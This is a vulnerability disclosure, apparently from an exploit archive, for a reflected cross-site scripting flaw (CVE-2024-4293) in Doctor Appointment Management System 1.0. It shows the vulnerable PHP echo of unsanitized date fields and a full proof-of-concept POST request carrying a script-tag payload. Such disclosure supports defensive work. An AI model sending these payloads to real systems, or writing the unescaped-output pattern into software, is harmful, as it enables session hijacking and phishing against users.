Headline
Doctor Appointment Management System 1.0 Cross Site Scripting
Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.
Application Name: Doctor Appointment Management System
Software Link: Download Link
Vendor Homepage: Vendor Homepage
BuG: XsS
BUG_Author: SoSPiro
Version: 1.0
CVE: CVE-2024-4293
Vulnerable code section:
http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php
Lines 57-61
Parameter
$fdate=$_POST['fromdate'];
and$tdate=$_POST['todate']
<?php
$fdate=$_POST['fromdate'];
$tdate=$_POST['todate'];
?>
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.
Vulnerability Description:
- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.
Proof of Concept (PoC)
Poc Video : Video Link
Poc Video2: Video Link
POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: close
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: blue
fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=
- In this POST request, an attacker has included a script tag in the “fromdate” and “todate” field:
<script>alert(1)</script>
- Upon successful exploitation, an alert box containing the text “1” will be displayed on the victim’s browser, indicating that the XSS vulnerability has been successfully exploited.
Impact:
- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.